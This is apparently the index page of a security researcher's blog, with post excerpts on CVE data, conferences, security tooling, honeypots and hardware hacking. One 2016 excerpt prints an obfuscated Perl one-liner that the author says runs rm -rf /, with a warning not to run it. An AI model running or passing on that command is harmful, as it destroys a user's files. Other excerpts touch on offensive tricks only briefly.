I play golf. I am not good at golf. But I have a Garmin Approach R10 launch monitor, a Python interpreter, and too much free time, so naturally I spent way more time building a dashboard to analyze my swing data than I did actually swinging a club. The result is jgamblin/golf, a self-hosted analytics pipeline that turns your Garmin…
Jerry Gamblin
https://jerrygamblin.com/ · 110 posts · history since 2016 · active
13 May
18 Apr
I spend a significant amount of my time thinking about EPSS, CVSS, and the inherent gaps in how we prioritize vulnerabilities. We all know the drill: a 9.8 CRITICAL that remains unexploited shouldn’t jump the line ahead of a 7.5 HIGH that is being actively used in the wild. Closing that gap between theoretical severity and actual exploitability is why…
1 Jan
2025 set a new baseline with 48,185 published CVEs. While the sheer volume is climbing, the median CVSS score remained surprisingly stable. We are seeing a distinct shift toward web application flaws (specifically in the CMS ecosystem) and a wider distribution of vendors, proving that vulnerabilities are spreading deeper into the supply chain. This massive growth is exactly why I…
14 Aug 2025
I’m incredibly excited to finally share something I’ve been pouring my heart into at RogoLabs. For those of you who caught my talk at BSidesLV, you got a sneak peek, but today it’s official: CNAScorecard.org is live! For years, the CVE program has been our shared language for identifying vulnerabilities. But lately, we’ve all felt the growing pains. We’re seeing…
30 Jul 2025
It’s that time of year again! The first week of August means my annual trip to the desert for “Security Summer Camp”—the whirlwind of BSides Las Vegas, Black Hat, and DEF CON. It’s always an exhausting but amazing week, and I can’t wait to dive in, catch up with everyone, and talk about what I’ve been working on. This year,…
5 Jan 2025
2024 brought unprecedented growth in CVE data, so I figured it would be appropriate to start the new year by exploring these statistics and highlighting some of the more intriguing data points. CVEs By The Numbers We ended 2024 with 40,009 published CVEs, up over 38% from the 28,818 CVEs published in 2023. CVEs By Month Month CVEs Percentage January…
30 Oct 2024
The Common Vulnerabilities and Exposures (CVE) program, launched in late October 1999, has not only marked its presence but has become a pivotal force in shaping how we perceive and manage cybersecurity threats. A Journey Through Time The CVE program emerged as a beacon, standardizing how vulnerabilities are identified, shared, and mitigated. From its inception with just 321 entries, it…
30 May 2024
The Last 100+ Days The NVD posted the notice below on its webpage in mid-February. Since then, nearly 13,000 CVEs have not been enriched with CWE, CVSS, and CPE data. The vulnerability management community was told that it would be addressed at Vulncon this year. At the conference, we were told the enrichment would restart “in the next couple of…
5 Jan 2024
Every year, I get asked, “How many CVEs do you think will be published this year?“ I am always willing to take a guess, but last year, I read Time Series Forecasting in Python. As I started to read more about the Kalman Filter, I figured it would work great for predicting CVE growth, so I built a simple model…
3 Jan 2024
2023 marked another year of record growth in CVE data, and I thought it fitting to kick off the new year by delving into these statistics and showcasing some of the more interesting data points. CVEs By The Numbers We ended 2023 with 28,902 published CVEs, up over 15% from the 25,081 CVEs published in 2022. On average, there were…
2 Aug 2023
Hacker Summer Camp, as it is colloquially known, is three security conferences that are all next week in Las Vegas. The three conferences that makeup Security Summer Camp are: While preparing for these conferences, I dug through their schedules and picked out the talks I was most interested in catching. BSides Las Vegas BSides Las Vegas is back with a…
3 Jul 2023
With the first half of 2023 over, I figured I would take some time and review the data and highlight some of the most interesting data points so far this year. This GitHub repo contains the code for all the data and graphs this blog uses. By The Numbers So far this year, there have been 14,129 published CVEs. On…
3 Apr 2023
Reference Rot (also called linked rot) is when hyperlinks, over time, cease to point to their originally targeted file, web page, or server due to that resource being relocated to a new address or permanently unavailable. Tod Beardsley from the CVE board gave a talk at the 2023 CVE Global Summit called ‘Link Rot: The Problem and Archiving for Posterity‘…
1 Jan 2023
2022 was a record-breaking growth year for CVE data, and I figured it would be a great way to start the new year by going through the data and highlighting some of the most interesting data points. All the data and graphs used in this blog are available in this GitHub repo. CVEs By The Numbers We ended 2022 with…
16 Nov 2022
The National Vulnerability Database plays a vital role in the CVE publication process that many people may overlook or not know they are responsible for. After MITRE publishes a CVE, the NVD enriches it with data points that make it actionable by security companies and professionals. Some of these data points include:CWECVSS 3.1 Base ScoreCPE I was recently asked how…
29 Oct 2022
For a recent project, I needed all the NVD CVE and EPSS data in Elasticsearch and couldn’t find an easy way to do it, so I built CVElk. CVElk quickly builds a local Elastic Stack using docker compose with the help of a simple shell and python script. Philipp Krenn from Elastic also contributed an updated dashboard to the project…
27 Jul 2022
Security Summer Camp, as it is colloquially known, is three security conferences that occur during the same week in Las Vegas. The three conferences that make up Security Summer Camp are: BSides Las Vegas Blackhat USA DEF CON While preparing for these conferences, I dug through their schedules and picked out the talks I was interested in catching. BSides Las…
13 May 2022
Covid restrictions are starting to be relaxed, so I am beginning to feel like Willie and am getting on the road again, and in the next six weeks, I am attending and presenting at these four amazing events. BSidesKy I am amazingly excited to attend bsides.ky in the Cayman Islands at the end of May, where I will be leading…
30 Dec 2021
I have spent a lot of time this year working with CVE data and most of that time in Jupyter notebooks. Over the holiday season, I decided to build a website from these notebooks using Github Actions, Github Pages and NBConvert. CVE.ICU ended up being the end product, and here is the source code. It is still an early work…
23 Jul 2021
In a Study in Scarlet, Sherlock Holmes said, “It is a capital mistake to theorize before one has data,” which is one of my favorite Sherlock quotes. For the last month or so, my team has been dealing with missing CPE data points in the Mitre CPE data, and it finally forced me to set down and put together a…
17 Jul 2021
I was recently asked if I had ever thought about trying to predict CVE growth. I had not, or really didn’t even know where to start, but after some research, I found the Prophet project that is a forecasting algorithm open-sourced by Facebook and uses the GAM family of algorithms. Using prophet with the NVD data in a Jupyter notebook…
6 Apr 2021
The first quarter of 2021 has been a busy quarter for the Project Zero (P0) team as they announced 16 “in the wild” zeros days. That is one new announcement a week on average. This is great for driving news cycles or if you’re in marketing and need some FUD to help sales. This isn’t so great if you are…
28 Dec 2020
That was the simple question I asked myself on Saturday morning, thinking the answer would likely be simple to find. It wasn’t and ended up 48 hours later with me building this jupyter notebook to find out. I really thought it would be as easy as pulling down the NVD data feeds and running a simple nvd['Published'].value_counts().head(10) to find out…
17 Dec 2020
I monitor the @CVENew Twitter feed to keep up with any interesting new vulnerabilities that are released. On December 11th CVE-2020-29589 was published claiming that “the kapacitor Docker images through 1.5.0-alpine contain a blank password for the root user” and that it has a CVSS score of 9.8. This CVE was just a re-report of CVE-2019-5021, which I researched last…
11 Dec 2020
I joined Kenna Security two years ago as their Principal Security Engineer not long after my friend JCran joined as the Head of Research. In the last two years, while building the security team, I have stayed deeply involved with the research team, and from time to time, some of that research was made public: Fifth of Docker Containers Have…
27 Aug 2020
Github Actions was launched last November and it has taken a little while to mature but it has recently got to the point where you can build a fairly robust application security pipeline using Github actions. In most of my projects, I can run a Linter, an SCA, a SAST and DAST tool aginst my code daily using open source…
18 May 2020
I have been spending a lot of time over the last few weeks looking at the OSQuery to get a better understanding of what it can do since it seems every major security tool from Sophos to Cisco to CarbonBlack is building it into their product. I have also been looking at Juypter notebooks for machine learning and data science…
25 Mar 2020
Did you know you can easily turn any video from Youtube into a background for Zoom (Version 4.6.4+) using a simple command-line tool called Youtube-DL. One of my favorite videos is The Traveling Bird Feeder so I will use it for this example. Install Youtube-dl: brew install youtube-dl Then fingerprint the video: youtube-dl -F https://www.youtube.com/watch?v=vu72ja_mGME Then download any video larger…
23 Feb 2020
Last summer I launched vulnerablecontainers.org to help shed light on the number of vulnerabilities in the 1,000 most popular containers on docker hub. While it was an interesting project, right after I launched the project I had multiple people ask if it was able to scan other public containers. Initially, it wasn’t but I wanted to offer the ability, so…
18 Feb 2020
With the RSA Conference less than a week away I figured I would spend a few minutes and write a quick post about what I am excited to see this year in San Francisco. Not At RSA Like most security conferences these days while the conference itself is the reason I go the auxiliary events end up providing a majority…
16 Jan 2020
One of my personal projects this year is to understand and build a SLAM (Simultaneous localization and mapping) robot. To get started I bought the Xaxxon OpenLidar and after a few struggles getting it to work correctly in a VM I finally did and decided to throw together my build notes for future reference. Virtual Platform While I would have…
26 Dec 2019
As the 2010s come to an end I started to think about what security stories from the last ten years changed how we think about security in this decade and the next. While this list is in no way complete these are the ten stories that I think had a lasting impact on security in the last decade and the…
12 Dec 2019
I had a new years resolution to Read More Books this past year and actually read around 20 books this year. Out of those books here is a quick list of some of my favorites from the past year that I really enjoyed. Stillness Is the Key This book was probably one of the most impactful books I read this…
6 Dec 2019
I spent the last week at AWS re:Invent 2019 in Las Vegas with over 65,000 other AWS users. This conference is always jammed packed with announcements and interesting discussions with people both inside and outside of my normal security bubble. Overall I really enjoy this conference even though it is ridiculously large and I spent over 6 hours on the…
12 Nov 2019
This week I gave a talk on Hacking Holiday Lights at Kenna Security and here is the promised accompanying blog that outlines the hardware and software I demoed for easy reference for anyone who wants to build their own holiday lights. Controller Boards I looked at a bunch of different boards that ended up having a variety of technical hurdles…
23 Oct 2019
I have been meaning to look at Cartography since I saw their talk at BSidesSF last year and I finally had a chance to start looking at it today. One of the first things I noticed was that is was not containerized so I built a quick container for it and decided to document my progress here. Prerequisites AWS CLI…
19 Sept 2019
I just spent a day and a half recovering my Github account after the code in my 2FA application stopped working for authentication. GitHub has a good support article on how to recover your account that has this ominous warning on it: Warning: For security reasons, GitHub Support may not be able to restore access to accounts with two-factor authentication…
8 Jul 2019
About once a month I need a Kali VM to use for an hour or so, and I am terrible at keeping a VM up-to-date, so this weekend I took a few hours and built a tool to download automatically, provision and update a Kali Linux VM in Virtualbox. All the code for this project is in this Github Project.…
2 Jul 2019
Recently I have been working on a project to use the Trivy container scanner to scan large swath of containers for open vulnerabilities that I wanted to quickly post here. There is a full blog about the project here on the Kenna site. Here are some of the pages I have built out so far: Top 1000 Popular Containers Scanned…
22 Apr 2019
I had the chance to attend LoCoMoCoSec this year and had a fantastic time. It was a well-run conference that was extremely focused on being friendly for families and being inclusive of the diverse group of people who make up our community. It also doesn’t hurt that it was in one of the most beautiful places I have ever seen.…
22 Feb 2019
With the 2019 RSA Conference fastly approaching I thought I would take a few minutes and put together a quick list of what I am excited to see this year. Sunday BSides San Francisco How to Build an Application Security Program (Presenting) Automating Web Application Bug Hunting (Presenting With @JCran) Monday RSAC Innovation Sandbox Contest CSA Summit BSides San Francisco…
26 Jan 2019
Bundle Audit is a great tool to check if the Ruby Gems used in your project have any known vulnerabilities. Most DevOps teams I know run this tool against their builds in their CI/CD process when deploying. This can mean that code that is not updated often can have vulnerable gems unless you have a way to continually monitor your…
15 Dec 2018
I have developed a bad habit of picking up vanity domain names and not really doing much with them. Last month at AWS Re:Invent I picked up ServerlessSecurity.org and really wanted to do something with it but didn’t feel like maintaining, or paying for, a VPS so after doing some looking around I found that is was possible to point…
10 Dec 2018
Here is a list of my favorite security books from 2018 if you are looking for that last minute gift or have some extra time around the holidays to catch up on some reading. The GCHQ Puzzle Book 2 I just got The GCHQ Puzzle Book 2, and like the original, it has quickly become the book that I always…
1 Dec 2018
I spent this last week in Las Vegas attending AWS Re:Invent. This event is mind-numbingly massive with classes happening at 4 or 5 hotels all over the strip. I personally spent over an hour every day on their (nice but extremely slow) shuttle buses between the MGM Grand, Aria and the Sands Expo Center. It would be impossible to see…
8 Nov 2018
I have started using the Burp Suite 2.0 beta full time recently, and some of the new features I knew I wanted to explore more was the API and the CI Integration. I took a few hours this last week and built a small POC shell script that will scan a website and open Github Issues for all findings. Here…
30 Oct 2018
Introduction I have always been a fan of Google Products, so when they announced the Google Home Hub, I ordered one. Once I got the Hub on my network I scanned it and it returned the following: Nmap scan report for hubHost is up (0.046s latency).Not shown: 995 closed portsPORT STATE SERVICE8008/tcp open http8009/tcp open ajp138443/tcp open https-alt9000/tcp open cslistener10001/tcp…
30 Aug 2018
The new rest API in Burp 2.0 it is going to be amazing but it will allow things like this 9 line shell script I wrote this morning that will grab all public bounty sites from @arkadiyt’s bounty-targets-data repo and kick off a full scan. https://gist.github.com/jgamblin/c22c0791af7572280d7fd569141650fe I almost didn’t post this blog because I *think* this script is, in general,…
28 Aug 2018
I spend a lot of time working with MacOS and I have noticed that out of the box the operating system has some basic security settings that are not enabled by default so I have built a small script that automates configuring these. It does the following: Requires Password Immediately After Sleep. Turns On Firewall. Enables Stealth Mode. Disables Remote…
7 May 2018
Recently I have noticed that companies that use Google Suite have a fairly common misconfiguration that is making their internal groups public. In some cases it is just the name of the groups but in some extreme cases the content of the posts are public. Testing for this misconfiguration on your domain is as easy as looking at: https://groups.google.com/a/%yourdomain.tld%/forum/#!forumsearch/ Google…
5 Mar 2018
I am a fan of Kali Linux and AWS so I love the fact that they have an official AMI. While spinning up a Kali instance in AWS is fairly easy, I had a long flight today so I wrote a script that will spin up a Kali instance in about 60 seconds. The script does the following: Builds a…
5 Jan 2018
Recently while working on a project I wanted to run OWSAP Dependency Check against a Github Organization to find any out of date frameworks but I couldn’t find an easy way to do it so I built a tool. Right now it will check Node and Ruby applications and put all the out of date frameworks in a single CSV.…
29 Dec 2017
On Friday, January 6th 2017 I walked into the first Yoga class of my life at YogaSol as part of fulfilling a new years resolution. I was in the best shape of my life. I was running, swimming and lifting weights multiple times a week. I weighed 165 pounds and was at 9% body fat. I was also really stressed…
5 Nov 2017
Like most security professionals I am spending a large amount of time helping my company move securely to AWS. Certificate management in AWS is done with AWS Certificate Manager and while they do offer *free* certificates, ACM generated certs are outside your direct control. You don’t get the keys which, at least for some things, should probably be a non-starter…
4 Sept 2017
Last November I hacked together a script that continually monitored your network and sent a slack alert when something change. It worked but I was never 100% happy with it so I spent some time this weekend and rewrote it so that is hopefully more user friendly and functional. Some changes in this version includes the ability to set timeouts…
24 Aug 2017
I was working on a project recently and was asked if it was possible to stop users from setting common passwords. Using the pam_cracklib module and @DanielMiessler common passwords list it is as simple as these 3 commands: sudo apt-get install libpam-cracklib -y sudo wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000000.txt /usr/share/dict/ -O /usr/share/dict/million.txt sudo create-cracklib-dict /usr/share/dict/million.txt Seriously
19 Aug 2017
Mod_Security is the most widely known and used server based Web Application Firewall but I had not had a chance to play with it so I decided to take sometime this weekend to build a website (modsec.handsonhacking.org) to test it. Here is a small walk through on how I did it. Base Server Install: I used AWS Lightsail to build…
14 Aug 2017
One of the things that even the new MacOS beta is missing is MAC Address Randomization on boot. After spending a few hours working on it I put together this completely hack-y solution that uses Spoof and an automator Script saved as an application. Here is how I configured it: Install Spoof Open Automator Select “Application” Add “Run Applescript” Copy…
14 Jul 2017
Security summer camp is about a week away so I spent some time this afternoon trying to figure out what talks and events I want to make sure I attend. BSides Las Vegas: A Day in the Life of a Product Security Incident Response Manager From SOC to CSIRT Hadoop Safari : Hunting For Vulnerabilities Introduction to Reversing and Pwning…
3 Jul 2017
I recently saw this SSH/HTTP(S) multiplexer on Github and tweeted that it looked amazing: An amazingly cool tool to run a webserver and a ssh on the same port: https://t.co/Z2eel3aIq5 — Jerry Gamblin (@JGamblin) July 2, 2017 A couple of people responded that you should be able to do the samething with HAProxy or something similar but my experience with…
12 Jun 2017
Often while doing research I need temporary access to a bunch of different virtual machines. While it is possible to do this on my Macbook using VMWare Fusion or Virtualbox the overhead seems unnecessary for something I will delete in under a week. My goto solution is a virtualization stack of: 16GB DigitalOcean Droplet + Wok + Kimchi Here is…
11 Jun 2017
I love OWASP (I wanted to get that out of the way) but they let their TLS certificate expire yesterday: Should it have happened to an organization whose whole goal is to secure web applications? No. There are a million reasons why their TLS certificate could have expired and plenty of reasons it shouldn’t have (OWASP uses letsencrypt for their…
29 May 2017
Have you ever wanted to control a vast medium small network of Honeypots but only had an hour and about $40 a month to spend on your project? So did I! So with the help of Digital Ocean and Anomali‘s Modern Honey Network we can now do it! For a basic distributed Cowrie network you will need: 1 – $20…
16 May 2017
In the last couple of years the Anti-Vaccination crowd in the United States has started to make inroads with more and more people deciding that the perceived risk of the vaccination outweighs the known risk of the disease. When you ask them why they dont vaccinatie they always have anecdotal evidence of how the vaccination could hurt them, how they…
4 May 2017
As I continue to try to learn R, I am trying to build tools that other people might find useful. Tonight with the help of Bob Rudis I built a script that will find domains with a keyword in it from DomainPunch, do a geoip lookup and map it if it is online. Since it is time to start thinking…
30 Apr 2017
Since I have started looking at the Umbrella DNS Popularity List I was interested in seeing how much the data changes day to day. I fired up RStuido and wrote some terrible code but finally got it to work with some help. Yesterday there were 80937 new DNS names on the list that were not on the list the day…
29 Apr 2017
Recently I started looking at the Umbrella DNS Popularity List and did a blog post about it here. The data seemed valuable and lacking at the same time so I spent my *limited* free time this week learning about R and RStudio. Protip: If you want to play along at home there is an RStudio docker container so all you…
25 Apr 2017
Cisco offers a daily list of the million most queried domain names from Umbrella (OpenDNS) users. I had some time this weekend so decided to spend some time playing around with the data to see what I could find so I spun up a lightsail server and got to work. Grabbing the file is as simple as: wget http://s3-us-west-1.amazonaws.com/umbrella-static/top-1m.csv.zip You…
17 Apr 2017
I am a huge fan of Tim Tomes and his Burp Suite Configuration Suggestions blog post. The problem is that I only use Burp a couple times a month and end up facing this screen and have to re-configure burp on every launch: So I built burpsettings.json that: Disables Browsers XSS Protection Disables Burp Collaborator Server Disables Intercept by Default…
13 Apr 2017
Today I was asked if it was possible to generate a list of domain names registered everyday with a keyword in the record (company name, city, trademark, etc). There are a few paid services that do this and domainpunch.com has a web based tool that will do this but I wanted to automate it so I could use it with…
3 Apr 2017
I am a big fan of DigiCert for TLS Certificates and CA/WebPKI services. While they have amazing customer support and are an amazing company to work with, there are not a lot of automation scripts to interact with their API available. So over the weekend and with a lot of help from Clint Wilson I built a shell script that:…
31 Mar 2017
An amazing mentor and leader I work with has been talking to me recently about what real leadership looks like and shared with me a list of quotes he keeps on his desk that his dad who had a leadership role in the military collected and gave to him. He gave me a copy and said I was free to…
29 Mar 2017
I am reading a book called “The Art of Authenticity” and in the book over a couple of chapters it talks about understanding what makes strong leaders and deciding who you should follow. I have pulled these 10 questions out of those chapters: What was your first leadership role? When you think about the process of becoming the leader that…
8 Mar 2017
Certificate transparency logs are an amazing way to get a good overview of your certificate landscape, detect fraud (bad guys also use TLS) and find shadow IT and unknown cloud services. The problem is that there are not many good places to search these logs. The best I have found is from Symantec, although it is slow and errors out…
5 Mar 2017
Ever since Charlie Miller hacked a Jeep while it was driving on the interstate I have wanted to learn more about Car Hacking but really had not had a chance to get started with it until a month ago when I ordered a Carloop and was ready to get hacking: … or so I thought. Turns out car hacking is…
9 Feb 2017
The RSA conference starts next week and lets be honest it is becoming known as a stuffy management conference with very little useful technical information but if you know where to look you can take some deep dives. I have put together a quick guide of some amazing talks and events I am looking forward to. Talks: BSidesSF – Coming…
20 Jan 2017
I was lucky enough to get a hold of an Insta360 Nano this week and it is some of the most amazing technology I have seen recently. It allows for truly instant 360 photos, videos and timelapse captures. As one of the people I was showing it to this week said it is the “selfiestick of 2017”. Here are some…
19 Jan 2017
I was at dinner on Tuesday with 6 security professionals and I proposed this hypothetical situation and I thought it was worth writing up and sharing. Background: Six identical safes with $1,000,000 inside are being built into the side of a public building and are being randomly assigned to everyone at the dinner. At the end of 90 days any…
6 Jan 2017
Scanning a host with Nmap is a fairly routine act for some in security to do but you from time to time you want to either get a different view of a host or try to conceal your public IP. In this case I use this simple “trick” to run an nmap scan through TOR. To do so you need…
30 Dec 2016
Yesterday US-Cert released information on GRIZZLY STEPPE the malware used in the DNC hack. The IP and hash information provided by the US-Cert was really lacking so I decided to dig through it and see if I could make more of it. The first thing I did was to run the IPs through an ipinfo2sheets spreadsheet I put together earlier…
29 Dec 2016
In November I saw this youtube video on turning a USB Air Purifier into a $75 USB Killer: My soldering skills are basically nonexistent so while I had some time off around the holidays I decided this would be a decent project to help improve them. So in early December I ordered 3 of these from Amazon: USB ionic Oxygen…
22 Dec 2016
I had a coach whose favorite quote was “Pain is the best teacher.” and that was the first thing that popped into my head this morning when I realized that I had left an $80 a month Digital Ocean Droplet running for an extra 3 weeks after I got done using it. To be honest $60 isn’t *that* painful but…
21 Dec 2016
I am a huge fan of snow and hacky one line linux commands. Thanks to some amazing people on twitter and a little too much free time at the end of the year they have both combined to bring snow to your terminal window just in time for your winter based holiday. This command works on OSX out of the…
20 Dec 2016
What will 2017 hold for the security industry? I sat down and looked into my crystal ball and came up with these 8 security predictions for 2017. A Fortune 500 Will Use “DDOS as a Service” To Attack A Competitor. A bored VP of Marketing with a paypal account, a six pack and a nephew who can get him on…
4 Dec 2016
I have been playing with my stack of pizero a bunch lately and tonight I decided to put together a piZero OTG Ethernet gadget that runs Kali (Really KaToolin), XRDP and Mate in a computer on a stick configuration. This way I have a full (as I want it to be) Kali installation with me as long as I have…
30 Nov 2016
I have been playing with my stack of piZero’s recently and started to read about the kernel OTG gadgets and was intrigued by the OTG_HID gadget. So after doing some reading I found that someone had ported the USB Rubber Ducky platform to the piZero and called it rspiducky. Building it is fairly straight forward but if you if you…
28 Nov 2016
I have been reading a lot about Beacon Frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames. I couldnt pass up a chance to test this so I pulled out my trusty TL-WN722N and made a list of the 5,0000 most common…
26 Nov 2016
Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use…
13 Nov 2016
In the last two years Burp Suite Proxy has become my go to web application security scanner. As with everything recently if I can automate it, I do. So this weekend I built a simple script to scan a website with Burp, create a PDF report and post it to Slack: Here is how I set it up: Create a…
9 Nov 2016
I have recently been automating a lot of my technical security tasks and building slack bots around them and it was w3af‘s turn. W3af is an amazing open source web application security scanner that my friend Andres Riancho writes and maintains. The goal of this project was to build scheduled and automated scans of my web properties with pdf reporting…
5 Nov 2016
As I have talked about before “You can’t defend what you dont know exists” so today while sitting around and trying to recover from walking pneumonia I wrote slackmap to continually nmap a network and post the differences to slack: Configuration is amazingly easy. I run a copy of this on a $5 a month Digitalocean Droplet for an external…
4 Nov 2016
I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.” While that is simple advice it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans)…
20 Oct 2016
I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet : sudo…
17 Oct 2016
Earlier this week someone sent me this one line perl script (that you shouldn’t run): perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Due to some really clever code obfuscation it runs rm -rf /. You can deobfuscate (is that word?) with this: perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"' While trying to figure out how this code code I stumbled upon…
5 Oct 2016
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500…
31 Aug 2016
I use nmap all the time at work and recently came across rainmap-lite which is an amazing web interface for nmap that allows you to easily schedule and email scan results. I wanted to be able to share it with a class I am teaching so I did what I have been doing lately and put it into a docker…
25 Aug 2016
One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap but the output is not great. I have been using a tool called websnort for…
17 Aug 2016
My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet. The build out is pretty simple, it is the SSHoneypot Docker Container I…
1 Aug 2016
I am at Security Summer Camp this week and you always hear about how how dangerous these networks are with no real proof so I decided to see how dangerous they are*. I built the most insecure docker container I can think of. It runs SSHD with the root password set to root* to see see what happens when I…
25 Jul 2016
I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss. I ended up with these 16 talks I am going to make a special point to see next week: BSidesLV Managing…
18 Jul 2016
Security Summer Camp (BSidesLV, Blackhat and Defcon) is the most important week in the security industry and as such you need to be prepared to network like a professional. Here are 6 things you can do this week to get ready: Freshen Up Your Social Media Profiles Is your twitter profile picture 4 years old? Does your twitter bio mention…
15 Jul 2016
We are two weeks away from Security Summer Camp (which is BSidesLV, Blackhat and Defcon)! So it is time for everyone to write their annual blog posts about what you must do before you head out. I want to be one of the cool kids so here is my list of 6 things to do before you pack: Delete All…
13 Jul 2016
While doing security research it is not uncommon for me to build and destroy between 20 and 25 cloud servers a week on Digital Ocean. While there are great guides like: My First 10 Minutes On a Server – Primer for Securing Ubuntu My First 5 Minutes On A Server; Or, Essential Security for Linux Servers I do not have…
10 Jul 2016
There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one. I am a huge fan of the Streisand privacy stack because it includes and L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package. The problem with Streisand…
9 Jul 2016
I worked with a consultant using the lair framework two years ago and since then I have been a huge fan of the project to manage pentest information. Tom Steele has done an amazing job with the project but it has been a pain to install but thanks to Ryan Hanson and Docker you can now setup a lair instance…
6 Jul 2016
One of the tips that security professionals love to give is to use a VPN on public wifi networks. This is great advice and (I personally like PrivateInternetAccess and NordVPN). Recently I noticed nike.com blocks traffic from TOR and VPN providers: That got me wondering what other websites were blocking traffic from these sources so I decided to test the…
4 Jul 2016
I had a 2014 Dell Chromebook 11 I was not doing anything so I decided to turn it into a stand alone Kali box using the Chromium OS Universal Chroot Environment. The installation steps are pretty simple: Add a l33t hacker sticker: Enable Developer Mode (this will wipe the device). Login and download the latest crouton. Access the terminal by…
23 Jun 2016
A picture started floating around the internet of Mark Zuckerberg holding an Instagram cutout: People almost instantly started to notice that his webcam and mic were taped over. While Mark Zuckerberg isnt exactly known for having great security practices, all his social media passwords were Dadada. This started a discussion in the office if someone could really spy on you…
20 Jun 2016
While rebuilding my iPad this weekend I noticed that I could name it an emoji. So I named my iPad 📱(U+1F4F1): While I don’t have any problem using the iPad it basically makes it unreachable on the network via hostname. From there I renamed all of my lab machines emojis. Mostly variations of 💩 (U+1F4A9) because I am sophomoric: In…
12 Jun 2016
Earlier today I ran across this blog post on hijacking windows .lnk file so I decided to build out and test a full POC for it using Windows 8.1. To reproduce this just copy these 7 lines into powershell and ctrl+c now runs calc.exe instead of copying your text: https://gist.github.com/jgamblin/4aa897a2cca6912eeea96a12d73d8cd6 For extra jerkiness this will shutdown a windows machine when…